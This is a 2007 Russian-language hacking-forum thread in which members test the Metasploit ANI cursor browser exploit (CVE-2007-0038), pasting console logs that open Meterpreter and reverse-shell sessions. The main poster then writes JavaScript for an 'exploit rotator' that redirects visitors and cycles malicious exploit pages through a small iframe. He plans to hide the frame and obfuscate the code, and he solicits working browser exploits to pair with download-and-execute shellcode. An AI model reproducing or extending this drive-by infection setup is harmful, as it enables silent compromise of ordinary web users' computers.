ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

05.04.2007, 10:31
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме: 12702287
Репутация:
4738
|
|
Затестил сегодня сплоит windows/browser/ani_loadimage_chunksize на WIN-XP-SP2+IE 6.0 - пока не работает, IE не валит, полезную нагрузку не выполняет, сессию не открыватет. Придётся ждать, когда его код доведут до ума, чтоб можно было исполнить начинку...
|
|
|

05.04.2007, 18:13
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме: 12702287
Репутация:
4738
|
|
Кто тестил ? На viste ?
На оффсайте показано, что работает:
msf exploit(ani_loadimage_chunksize) > exploit
[*] Started reverse handler
[*] Using URL: http://10.4.4.1:8080/foo
[*] Server started.
[*] Exploit running as background job.
msf exploit(ani_loadimage_chunksize) >
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73739 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (10.4.4.1:4444 -> 10.4.4.2:49310)
msf exploit(ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer: VMVX86
OS : Windows Vista (Build 6000, ).
meterpreter > execute -f cmd
[-] stdapi_sys_process_execute: Operation failed: 5
meterpreter >
Кто не хочет делать обновление релиза 3.0 можете скачать сплоит отдельно тут.
У кого виста + msf 3.0 релиз может затестите? На XP-SP2, цели 0,1,2 чёт не пашет 
|
|
|

05.04.2007, 19:39
|
|
Познающий
Регистрация: 01.02.2007
Сообщений: 41
Провел на форуме: 1718137
Репутация:
201
|
|
Сообщение от systeminfo
Название ОС: MicrosoftR Windows VistaT Ultimate
Версия ОС: 6.0.6000 Н/Д сборка 6000
У меня не заработал сплойт.
|
|
|

10.04.2007, 17:28
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме: 12702287
Репутация:
4738
|
|
Кароче есть функция:
Код:
function changePage() {
document.getElementById( "ifrm" ).src = sites[currentPage];
}
Вызываем в теле функцию:
Код:
<body onload="changePage()">
<iframe id="ifrm" src=""/>
</body>
и получаем в Ифрейме нужную страничку.
А мне хотелось бы не в Ифрейме, а просто перенаправить на неё юзера. И открыть в этом же (не в новом) окне. Как реализовать?
|
|
|

11.04.2007, 14:04
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме: 12702287
Репутация:
4738
|
|
Модернизируем так:
function changePage() {
return sites[currentPage];
}
</script>
<body onload="var page=changePage(); javascript:location.replace(page)">
Перенаправляем юзера на нужную страницу в зависимости от ситуации (а их может быть 256 - про запас  ). Ну я от Маков пока отказался, так, что 128. А странички будут уже содержать ротацию сплоитов. Вообщем приступаем к созданию страницы с ротацией сплоитов (универсальной) - то есть запихнём в её IFRAME все наши сплоиты, а потом можно будет вычеркнуть, те которые заведомо не подходят под конкретную ситуацию (Браузер, систему).
|
|
|

11.04.2007, 15:12
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме: 12702287
Репутация:
4738
|
|
Типовой код файла rotor[N].html
Код:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<title>rotor0</title>
</head>
<script type="text/javascript">
sploits = new Array();
currentSploit = 0;
//тут заменим наши сайты вредоносными страницами, которые будут содержать эксплоиты.
sploits[0] = "0.html";
sploits[1] = "1.html";
sploits[2] = "2.html";
sploits[3] = "3.html";
sploits[4] = "4.html";
sploits[5] = "5.html";
sploits[6] = "6.html";
sploits[7] = "7.html";
sploits[8] = "8.html";
sploits[9] = "9.html";
sploits[10] = "10.html";
sploits[11] = "11.html";
function changeSploit() {
document.getElementById( "ifrm" ).src = sploits[currentSploit];
currentSploit++;
if (currentSploit >= sploits.length) {
currentSploit = 0;
}
}
setInterval( "changeSploit()", 5000 );
</script>
<body onload="changeSploit()">
<iframe id="ifrm" src="" style="text-align: Justify; padding-left:0px; padding-top:0px; height: 5%; width:10%; ">
</body>
</html>
Проверим - работает во всех трёх браузерах.
Интервал потом надо будет уточнить, так как некоторым сплоитам на переполнение необходимо много времени, также набор сплоитов и количество для каждой ситуации будет свой. Не забудем потом сделать размер фрейма нулевым и про обфускацию html кода.
|
|
|

12.04.2007, 11:24
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме: 12702287
Репутация:
4738
|
|
Вот сделал подборку документации по Ruby (ведь все сплоиты в пакете на нём написаны) в chm всем качать скачать
Последний раз редактировалось -=lebed=-; 12.04.2007 в 11:48..
|
|
|

13.04.2007, 21:58
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.03.2007
Сообщений: 1,985
Провел на форуме: 3288241
Репутация:
3349
|
|
Пояснения к сплоиту.
Народ, а вы случайно не подумали для чего в сплоите ANI есть такие стоки:
[I]# Should work for all English XP SP2
[ 'Windows XP SP2 userenv.dll English', { 'Ret' => 0x769fc81a }],
Просто этот адресм может постоянно меняться в зависимости от версии винды и языка. Даже патчи влияют на эти адреса.
Поэтому мне кажется что смысл такого сплоита - нулевой. при нормальных условиях.
Т.е. можно создать скрипт с базой этих адресов. И перебирать все адреса!
|
|
|

30.04.2007, 17:22
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме: 12702287
Репутация:
4738
|
|
Затестил сплоит windows/browser/ani_loadimage_chunksize с начинкой реверсшелл, сработало!
use windows/browser/ani_loadimage_chunksize
>> info windows/browser/ani_loadimage_chunksize
Name: Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP)
Version: 4795
Platform: Windows
Privileged: No
License: Metasploit Framework License
Provided by:
hdm <hdm@metasploit.com>
skape <mmiller@hick.org>
Available targets:
Id Name
-- ----
0 Automatic
1 Windows XP SP2 user32.dll 5.1.2600.2622
2 Windows XP SP2 userenv.dll English
3 Windows XP SP2 userenv.dll French
4 Windows XP SP0/SP1 netui2.dll English
5 Windows 2000 SP0-SP4 netui2.dll English
6 Windows Vista user32.dll 6.0.6000.16386
7 Windows XP SP2 user32.dll (5.1.2600.2180) Multi Language
8 Windows XP SP2 userenv.dll English
9 Windows XP SP2 user32.dll (5.1.2600.2180) English
10 Windows XP SP2 userenv.dll Portuguese (Brazil)
11 Windows XP SP1a userenv.dll English
12 Windows XP SP1a shell32.dll English
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 192.168.1.33 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
URIPATH no The URI to use for this exploit (default is random)
Payload information:
Space: 1234
Description:
This module exploits a buffer overflow vulnerability in the
LoadAniIcon() function of USER32.dll. The flaw is triggered through
Internet Explorer (6 and 7) by using the CURSOR style sheet
directive to load a malicious .ANI file. Internet Explorer will
catch any exceptions that occur while the invalid cursor is loaded,
causing the exploit to silently fail when the wrong target has been
chosen. This module will be updated in the near future to perform
client-side fingerprinting and brute forcing. This vulnerability was
discovered by Alexander Sotirov of Determina and was rediscovered,
in the wild, by McAfee.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2007-0038
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2007-1765
http://www.securityfocus.com/bid/23194
http://www.microsoft.com/technet/security/advisory/935423.mspx
http://www.determina.com/security_center/security_advisories/securityadvisory_0day_032907.asp
http://www.determina.com/security.research/vulnerabilities/ani-header.html
>> set URIPATH test
URIPATH => test
>> show payloads
Compatible payloads
===================
Name Description
---- -----------
generic/shell_bind_tcp Generic Command Shell, Bind TCP Inline
----------- тут другие начинки, пропущены -------------
windows/shell_reverse_tcp Windows Command Shell, Reverse TCP Inline
----------- тут другие начинки, пропущены -------------
>> set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
>> set LHOST 192.168.1.33
LHOST => 192.168.1.33
>> exploit
[*] Started reverse handler
[*] Using URL: http://192.168.1.33:8080/test
[*] Server started.
[*] Exploit running as background job.
[*] Command shell session 1 opened
(192.168.1.33:4444 -> 192.168.1.33:3402)
>> sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Command shell 192.168.1.33:4444 -> 192.168.1.33:3402
>> sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows XP [‚¥àá¨ï 5.1.2600]
(‘) Š®à¯®à æ¨ï Œ ©ªà®á®äâ, 1985-2001.
D:\Documents and Settings\Admin>
>> dir
dir
’®¬ ¢ ãáâனá⢥ D ¨¬¥¥â ¬¥âªã WIN_XP_SP2
‘¥à¨©ë© ®¬¥à ⮬ : 455F-C2C7
‘®¤¥à¦¨¬®¥ ¯ ¯ª¨ D:\Documents and Settings\Admin
04.12.2006 19:49 <DIR> .
04.12.2006 19:49 <DIR> ..
04.12.2006 19:32 <DIR> ƒ« ¢®¥ ¬¥î
04.12.2006 19:49 <DIR> Œ®¨ ¤®ªã¬¥âë
04.12.2006 19:49 <DIR> ˆ§¡à ®¥
04.12.2006 19:32 <DIR> � ¡®ç¨© á⮫
10.12.2006 19:33 15 .bash_history
11.12.2006 00:23 44 %1
03.02.2007 18:56 <DIR> WINDOWS
30.04.2007 11:11 <DIR> .msf3
3 ä ©«®¢ 100ÿ653 ¡ ©â
9 ¯ ¯®ª 663ÿ971ÿ840 ¡ ©â ᢮¡®¤®
D:\Documents and Settings\Admin>
В кэше IE получается 10 картинок, сам html-код запутан и потом не пашет, если сохранить локально, вместе с картинками... 
Последний раз редактировалось -=lebed=-; 30.04.2007 в 20:36..
|
|
|

01.05.2007, 09:57
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме: 12702287
Репутация:
4738
|
|
Требуется Ваше участие для того чтоб закончить ротатор и сделать альфа версию ротатора с минимальным набором сплоитов (хотя-бы 8-10 последних, актуальных паблик сплоитов) и рабочую, а именно - требуются рабочие=исправленные паблик-сплоиты (HTML) для IE, Opera, FireFox, к которым можно прикрутить шелл-код: загрузчик EXE + исполнение, так как не все сплоиты можно сгенерировать Мetasploit`ом. Пишите в личку или тут, присылайте исправленный рабочий код или давайте ссылки, включу эксплоиты в этот ротатор. В частности нужен windows/browser/ani_loadimage_chunksize - сплоит (на html+java), использующий уязвимость в обработке анимированных курсоров.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|